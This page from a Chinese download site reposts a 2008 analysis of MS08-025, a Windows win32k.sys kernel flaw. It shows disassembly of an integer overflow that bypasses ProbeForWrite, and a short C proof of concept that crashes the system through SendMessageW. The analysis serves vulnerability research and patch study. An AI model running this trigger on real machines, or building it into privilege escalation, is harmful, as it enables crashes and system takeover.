HI,欢迎您光临本站,秉承服务宗旨,销售只是起点,服务永无止境!
    • 短视频文案
      • 励志哲理
      • 名言美句
      • 情感语录
      • 回复热评
      • 解说文案
    • 短视频素材
      • 情感励志
      • 美食小吃
      • 体育运动
      • 生活人文
      • 妙招好物
      • 风景风光
      • 影音娱乐
      • 颜值时尚
      • 游戏动漫
      • 自然景观
    • 短视频课程
      • 同城课程
      • 带货课程
      • 投放课程
      • 玩法课程
    • 中视频素材
    • 短视频工具
    • 副业项目
资源分享吧
  • 首页
  • CMS模板host
    • DEDECMS模板965
    • 易优CMS318
    • WordPress模板146
    • Discuz模板101
    • 帝国CMS102
    • 苹果cms78
    • Pbootcms24
    • zblog模板2
  • 整站源码
    • 教育/交友/直播76
    • 商城/淘宝/网店26
    • 门户/论坛/信息27
    • 小说/新闻/博客76
    • 电影/视频/音乐22
    • 图片/素材/下载49
    • 支付/金融/货币356
    • 导航/目录/友链25
    • 会员/推广/任务57
    • 公众号/小程序/游戏133
  • 一元夺宝new
    E启学在线网校网站在线教育校园教学平台程序系统V1.0源码
    E启学在线网校网站在线教育校园教学平台程序系统V1.0源码
    Laravel开发MeEdu在线点播网站源码 知识付费应用系统源码
    Laravel开发MeEdu在线点播网站源码 知识付费应用系统源码
    一比一精仿电影挖片网苹果cmsv10模板
    一比一精仿电影挖片网苹果cmsv10模板
    织梦高仿dede58织梦模板下载站完整无错整站版源码 1.69GB打包
    织梦高仿dede58织梦模板下载站完整无错整站版源码 1.69GB打包
    蓝色清晰织梦资源网下载站源码
    蓝色清晰织梦资源网下载站源码
    全景通旗舰版最新源码 内核到krpano1.19pr8 支持任何高清图
    全景通旗舰版最新源码 内核到krpano1.19pr8 支持任何高清图
    thinkPHP音视频素材资源下载站整站源码 带会员系统+支付接口
    thinkPHP音视频素材资源下载站整站源码 带会员系统+支付接口
    仿集图网模板图片素材类模板织梦下载站源码带整站数据
    仿集图网模板图片素材类模板织梦下载站源码带整站数据
    织梦蓝色图纸展示类企业网站源码
    织梦蓝色图纸展示类企业网站源码
    Thinkphp5.0响应式进销存仓库管理系统源码
    Thinkphp5.0响应式进销存仓库管理系统源码
    prev
    next
  • 网页素材
    • 网页游戏148
    • 网页模板4723
    • 特效代码5467
  • 办公素材
    • PPT模板377
    • 简历模板0
  • 站长学院
    • DEDE教程352
    • wordpress教程416
    • SEO教程124
    • 其它文档教程13
  • 更多
    • 办公教程4
    • 群辉教程12
    • 电脑基础7124
    • GPS导航
    • 安卓系统15
      • Android资讯2
      • ROM0
      • 教程工具0
    • Win系统169
      • Windows XP3
      • Windows 77
      • Windows 80
      • Windows 1012
      • 服务器系统1129
      • Win主题12
      • Win教程26
      • Win资讯0
      • Win软件98
    • 站点标签
    • 更新日志
    • 其他10
登录/注册
  • 精品会员专享
  • 会员折扣下载
  • 每日海量更新
立即开通 开通会员抄底价
当前位置:资源分享吧 > Windows 内核漏洞 ms08025 分析
也想出现在这里? 联系我们吧

Windows 内核漏洞 ms08025 分析

作者 : 小编 本文共4213个字,预计阅读时间需要11分钟 发布时间: 2021-06-17 共3.76K人阅读
也想出现在这里? 联系我们吧

Windows 内核漏洞 ms08025 分析

Author: Polymorphours

Email: Polymorphours@whitecell.org

Homepage:http://www.whitecell.org

Date: 2008-04-10

经内部讨论后决定公布分析成果。

4月8号microsoft再次发布了一个系统内核的补丁(KB941693),

微软对该漏洞的描述为: 此安全更新解决 Windows 内核中一个秘密

报告的漏洞。 成功利用此漏洞的本地攻击者可以完全控制受影响的

系统。 攻击者可随后安装程序;查看、更改或删除数据;或者创建

新帐户。这是用于 Windows 2000、Windows XP、Windows Server 2003、

Windows Vista 和 Windows Server 2008 所有受支持版本的重要安全

更新。此安全更新通过修改 Windows 内核验证从用户模式传递过来的

输入的方式来解决此漏洞。

从这个介绍中我们看到这个漏洞影响非常广,从2000到2008。为了

能一睹这个漏洞的细节,我分析了ms08-025的补丁,发现该漏洞存在于

win32k.sys 模块中。在这个补丁中修补了win32k.sys中的多个地方,其

中出问题的地方非常有趣,是因为溢出寄存器来绕过 ProbeForWrite

函数对用户层传来的指针的检查,下面我们就从 NtUserfnOUTSTRING

函数中的问题来展开我们的分析(我分析的平台是winxp sp2)

.text:BF86FB04 ; int __stdcall NtUserfnOUTSTRING(int,int,int,PVOID Address,int,int,int)

.text:BF86FB04 __stdcall NtUserfnOUTSTRING(x, x, x, x, x, x, x) proc near

.text:BF86FB04 ; CODE XREF: xxxDefWindowProc(x,x,x,x) 6Ep

.text:BF86FB04 ; NtUserMessageCall(x,x,x,x,x,x,x) 61p

.text:BF86FB04 ; xxxSendMessageToClient(x,x,x,x,x,x,x)-Ep

.text:BF86FB04 ; xxxSendMessageToClient(x,x,x,x,x,x,x) 6Dp

.text:BF86FB04 ; xxxWrapCallWindowProc(x,x,x,x,x)-4Bp

.text:BF86FB04 ; xxxWrapCallWindowProc(x,x,x,x,x) 60p …

.text:BF86FB04

.text:BF86FB04 var_24 = dword ptr -24h

.text:BF86FB04 var_20 = dword ptr -20h

.text:BF86FB04 UserBuffer = dword ptr -1Ch

.text:BF86FB04 ms_exc = CPPEH_RECORD ptr -18h

.text:BF86FB04 arg_0 = dword ptr 8

.text:BF86FB04 arg_4 = dword ptr 0Ch

.text:BF86FB04 arg_8 = dword ptr 10h

.text:BF86FB04 Address = dword ptr 14h

.text:BF86FB04 arg_10 = dword ptr 18h

.text:BF86FB04 arg_14 = dword ptr 1Ch

.text:BF86FB04 arg_18 = dword ptr 20h

.text:BF86FB04

.text:BF86FB04 ; FUNCTION CHUNK AT .text:BF86FAE1 SIZE 0000001E BYTES

.text:BF86FB04

.text:BF86FB04 push 14h

.text:BF86FB06 push offset unk_BF98D250

.text:BF86FB0B call __SEH_prolog

.text:BF86FB0B

.text:BF86FB10 xor edx, edx

.text:BF86FB12 mov [ebp ms_exc.disabled], edx

.text:BF86FB15 mov eax, [ebp var_20]

.text:BF86FB18 mov ecx, 7FFFFFFFh

.text:BF86FB1D and eax, ecx

.text:BF86FB1F mov esi, [ebp arg_18]

.text:BF86FB22 shl esi, 1Fh

.text:BF86FB25 or eax, esi

.text:BF86FB27 mov [ebp var_20], eax

.text:BF86FB2A mov esi, eax

.text:BF86FB2C xor esi, [ebp arg_8] -> esi = 缓冲区长度

.text:BF86FB2F and esi, ecx

.text:BF86FB31 xor eax, esi

.text:BF86FB33 mov [ebp var_20], eax

.text:BF86FB36 cmp [ebp arg_18], edx -> 如果是 ansi 方式就直接进行检查,否则需要计算unicode的大小

.text:BF86FB39 jnz short loc_BF86FB47

.text:BF86FB39

.text:BF86FB3B lea esi, [eax eax] <- 注意这里,问题就在这里,此时 eax = unicode字符串的长度,

<- 当 eax = 0x80000000 的时候 eax eax = 0x100000000,32位的寄存器

<- 被溢出了,esi = 0

.text:BF86FB3E xor esi, eax

.text:BF86FB40 and esi, ecx

.text:BF86FB42 xor eax, esi

.text:BF86FB44 mov [ebp var_20], eax -> 保存unicode占用的空间大小

.text:BF86FB44

.text:BF86FB47

.text:BF86FB47 loc_BF86FB47: ; CODE XREF: NtUserfnOUTSTRING(x,x,x,x,x,x,x) 35j

.text:BF86FB47 mov [ebp var_24], edx

.text:BF86FB4A mov esi, [ebp Address]

.text:BF86FB4D mov [ebp UserBuffer], esi

.text:BF86FB50 xor ebx, ebx

.text:BF86FB52 inc ebx

.text:BF86FB53 push ebx ; Alignment

.text:BF86FB54 and eax, ecx

.text:BF86FB56 push eax ; Length <- 由于 eax = 0,所以ProbeForWrite被绕过

.text:BF86FB57 push esi ; Address

.text:BF86FB58 call ds:ProbeForWrite(x,x,x)

bf80a1b0 e96ef4ffff jmp win32k!xxxRealDefWindowProc 0x1235 (bf809623)

bf80a1b5 d1e8 shr eax,1

bf80a1b7 894510 mov [ebp 0x10],eax

bf80a1ba ebf1 jmp win32k!xxxRealDefWindowProc 0x190 (bf80a1ad)

bf80a1bc 8b4514 mov eax,[ebp 0x14]

bf80a1bf f6400780 test byte ptr [eax 0x7],0x80

bf80a1c3 8b4008 mov eax,[eax 0x8]

bf80a1c6 7408 jz win32k!xxxRealDefWindowProc 0x105 (bf80a1d0)

bf80a1c8 c60000 mov byte ptr [eax],0x0

bf80a1cb e951f4ffff jmp win32k!xxxRealDefWindowProc 0x1225 (bf809621)

bf80a1d0 668910 mov [eax],dx <- 在这里,对前面传入的指针进行了2个字节的写操作,写入的数据为0

bf80a1d3 e949f4ffff jmp win32k!xxxRealDefWindowProc 0x1225 (bf809621)

bf80a1d8 6a00 push 0x0

bf80a1da 6a02 push 0x2

bf80a1dc ff7638 push dword ptr [esi 0x38]

bf80a1df e8d1690200 call win32k!BuildHwndList (bf830bb5)

bf80a1e4 8bf8 mov edi,eax

bf80a1e6 85ff test edi,edi

bf80a1e8 0f8433f4ffff je win32k!xxxRealDefWindowProc 0x1225 (bf809621)

bf80a1ee 8d7710 lea esi,[edi 0x10]

那么怎么触发这个漏洞呢,我又分析了 user32.dll 和 win32k!NtUserMessageCall,

发现触发这个漏洞很简单,只需要调用 SendMessageW 发送WM_GETTEXT 消息就能够触发了,

下面是poc代码(注,改代码运行后由于在内核写了未映射的内存,会直接蓝屏,要改成可

用的exploit,可以参考我以前的exploit)

#include <stdio.h>

#include <windows.h>

int main(int argc,char *argv[])

{

DWORD dwHookAddress = 0x80000000;

printf( "\\tMS08-025 Local Privilege Escalation Vulnerability Exploit(POC)\\n\\n" );

printf( "Create by Whitecell’s Polymorphours@whitecell.org 2008/04/10\\n" );

SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, dwHookAddress );

return 0;

}

WSS(Whitecell Security Systems),一个非营利性民间技术组织,致力于各种系统安全技术的研究。坚持传统的hacker精神,追求技术的精纯。

技术网络漏洞 漏洞 漏洞分析 网站漏洞检测 网络安全WEB漏洞
1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » Windows 内核漏洞 ms08025 分析

常见问题FAQ

免费下载或者VIP会员专享资源能否直接商用?
本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
织梦模板使用说明
你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html
小编

小编 VIP

分享到:
上一篇
黑客入门之漏洞分类及进一步发掘
下一篇
迅雷ActiveX控件远程代码执行漏洞

发表评论 取消回复

要发表评论,您必须先登录。

最新文章
餐饮火锅加盟网站pbootcms模板源码
餐饮火锅加盟网站pbootcms模板源码
源码下载新闻资讯博客网站pbootcms模板
源码下载新闻资讯博客网站pbootcms模板
绿色人造草坪地坪施工网站源码pbootcms模板
绿色人造草坪地坪施工网站源码pbootcms模板
红色火锅加盟网站pbootcms模板源码
红色火锅加盟网站pbootcms模板源码
蓝色源码钢结构工程基建网站pbootcms模板
蓝色源码钢结构工程基建网站pbootcms模板
标签云
DEDECMS (483) dedecms教程 (326) eyoucms (270) html (364) html5 (1717) html模板 (733) Linux (1245) linux教程 (1245) wordpress教程 (380) 下载 (277) 代码 (816) 企业网站模板 (874) 企业网站模板下载 (874) 免费企业网站模板 (874) 入侵防御 (270) 公司网站模板 (874) 切换 (502) 动画 (594) 国内网站模板 (324) 图片 (582) 技术网络漏洞 (347) 插件 (447) 效果 (765) 源码 (381) 漏洞 (371) 漏洞分析 (347) 特效 (789) 电脑使用 (4064) 电脑操作 (4064) 短视频素材 (606) 笔记本电脑价格 (4037) 笔记本电脑品牌排行 (4037) 笔记本电脑知识 (4037) 笔记本电脑评测 (4037) 素材 (483) 织梦 (407) 织梦教程 (342) 网站模板 (436) 网站源码 (417) 网站漏洞检测 (347) 网络安全WEB漏洞 (347) 菜单 (299) 视频 (376) 这是 (345) 鼠标 (417)

限时优惠

【阿里云】云产品采购季,助力行业复工。新用户专享1折起,云服务器低至0.75折,更多产品可叠加专属代金券下单
立即查看

相关推荐

Cisco IOS的OSPF、Sup720或RSP720等拒绝服务漏洞
小编小编

Cisco IOS的OSPF、Sup720或RSP720等拒绝服务漏洞

受影响系统: Cisco IOS 12.2 描述: Cisco IOS是思科网络设备中所使用的互联网操作系统。 如果有漏洞的Cisco设备配置了开放最短路径优先(OSPF)Sham-Link和多协议标签交换(MPLS)虚拟专用网(VPN)的话,就可能受...
  • 1.13K
  • 免费
  • 下载
Adobe Flash CS3 Professional FLA 代码执行漏洞
小编小编

Adobe Flash CS3 Professional FLA 代码执行漏洞

受影响系统: Adobe Flash Professional 8 Adobe Flash CS3 Professional 9.0 Adobe Flash Basic 8 描述: Adobe Flash CS3 Professional软件是用于为数...
  • 2.13K
  • 免费
  • 下载
RealPlayer rmoc3260.dll ActiveX含内存破坏漏洞
小编小编

RealPlayer rmoc3260.dll ActiveX含内存破坏漏洞

受影响系统: Real Networks RealPlayer 11.0.1 (build 6.0.14.794) 描述: RealPlayer是一款流行的多媒体播放器,支持多种媒体格式。 RealPlayer的rmoc3260.dll ActiveX...
  • 3.88K
  • 免费
  • 下载
Python stringobject.c多个远程溢出漏洞
小编小编

Python stringobject.c多个远程溢出漏洞

受影响系统: Python Software Foundation Python <= 2.5.2 描述: ——————————...
  • 3.3K
  • 免费
  • 下载
  • 3097本站运营(天)
  • 62863用户总数
  • 26548资源数(个)
  • 2近7天更新(个)
  • 82301资源大小(GB)
加入VIP获取全站资源

「资源分享吧」 ZYFX8.CN

国内极具人气的网络源码资源交流学习平台
下载源码文章,学软件教程,找灵感素材,尽在「资源分享吧」

按Ctrl+D收藏本站

找资源就上「 资源分享吧 」

WWW.ZYFX8.CN

资源分享吧

资源分享吧(www.zyfx8.cn)是一家专门做精品素材的网站,网站以网站源码、网站模板、网页特效为主要内容,以“共享创造价值”为理念,以“尊重原创”为准则。

本站导航
  • 热门标签
  • 网站专题
  • 站点地图
更多导航
  • 申请友链
  • 用户协议
  • 免责声明
快速搜索
    友情链接 自助申请友链
  • RiTheme主题
  • wordpress主题
  • 在线PS修图
  • 源码下载
  • 网站模板
  • 资源分享吧
Copyright 2015-2020 版权所有 资源分享吧 Rights Reserved. 蜀ICP备14022927号-1
资源分享吧(www.zyfx8.cn)是一家专门做精品素材的网站,以“共享创造价值”为理念,以“尊重原创”为准则。
  • 会员特惠
  • 签到
  • 客服

    在线客服

    点我联系

    直接说出您的需求!
    切记!带上资源链接与问题!

    工作时间: 9:30-21:30

  • 更新
    日历
  • 全屏
  • 首页

  • 签到

  • 切换

  • 客服

资源分享吧
  • 登录
  • 注册
or
or
忘记密码?
资源分享吧
  • 首页
  • CMS模板host ►
    • DEDECMS模板965
    • 易优CMS318
    • WordPress模板146
    • Discuz模板101
    • 帝国CMS102
    • 苹果cms78
    • Pbootcms24
    • zblog模板2
  • 整站源码 ►
    • 教育/交友/直播76
    • 商城/淘宝/网店26
    • 门户/论坛/信息27
    • 小说/新闻/博客76
    • 电影/视频/音乐22
    • 图片/素材/下载49
    • 支付/金融/货币356
    • 导航/目录/友链25
    • 会员/推广/任务57
    • 公众号/小程序/游戏133
  • 一元夺宝new
    E启学在线网校网站在线教育校园教学平台程序系统V1.0源码
    E启学在线网校网站在线教育校园教学平台程序系统V1.0源码
    Laravel开发MeEdu在线点播网站源码 知识付费应用系统源码
    Laravel开发MeEdu在线点播网站源码 知识付费应用系统源码
    一比一精仿电影挖片网苹果cmsv10模板
    一比一精仿电影挖片网苹果cmsv10模板
    织梦高仿dede58织梦模板下载站完整无错整站版源码 1.69GB打包
    织梦高仿dede58织梦模板下载站完整无错整站版源码 1.69GB打包
    蓝色清晰织梦资源网下载站源码
    蓝色清晰织梦资源网下载站源码
    全景通旗舰版最新源码 内核到krpano1.19pr8 支持任何高清图
    全景通旗舰版最新源码 内核到krpano1.19pr8 支持任何高清图
    thinkPHP音视频素材资源下载站整站源码 带会员系统+支付接口
    thinkPHP音视频素材资源下载站整站源码 带会员系统+支付接口
    仿集图网模板图片素材类模板织梦下载站源码带整站数据
    仿集图网模板图片素材类模板织梦下载站源码带整站数据
    织梦蓝色图纸展示类企业网站源码
    织梦蓝色图纸展示类企业网站源码
    Thinkphp5.0响应式进销存仓库管理系统源码
    Thinkphp5.0响应式进销存仓库管理系统源码
    prev
    next
  • 网页素材 ►
    • 网页游戏148
    • 网页模板4723
    • 特效代码5467
  • 办公素材 ►
    • PPT模板377
    • 简历模板0
  • 站长学院 ►
    • DEDE教程352
    • wordpress教程416
    • SEO教程124
    • 其它文档教程13
  • 更多 ►
    • 办公教程4
    • 群辉教程12
    • 电脑基础7124
    • GPS导航
    • 安卓系统15 ►
      • Android资讯2
      • ROM0
      • 教程工具0
    • Win系统169 ►
      • Windows XP3
      • Windows 77
      • Windows 80
      • Windows 1012
      • 服务器系统1129
      • Win主题12
      • Win教程26
      • Win资讯0
      • Win软件98
    • 站点标签
    • 更新日志
    • 其他10
文章展示
交易所源码搭建教程java多语言部署
交易所源码搭建教程java多语言部署
餐饮火锅加盟网站pbootcms模板源码
餐饮火锅加盟网站pbootcms模板源码
源码下载新闻资讯博客网站pbootcms模板
源码下载新闻资讯博客网站pbootcms模板
绿色人造草坪地坪施工网站源码pbootcms模板
绿色人造草坪地坪施工网站源码pbootcms模板
红色火锅加盟网站pbootcms模板源码
红色火锅加盟网站pbootcms模板源码
蓝色源码钢结构工程基建网站pbootcms模板
蓝色源码钢结构工程基建网站pbootcms模板
开通VIP 享更多特权,建议使用QQ登录
账号登录/注册
QQ登录
微博登录
×

    回馈用户限时特惠

    「 资源分享吧 」国内极具人气的网络资源交流学习平台,海量资源每天更新,优质资源畅快下载

    终身SVIP原价 590元,国庆限时活动价仅需 “ 59元 ”,终身免费~~机不可失~~


    立即开通永久会员>>

    QE** 刚刚下载了 2020最新酷睿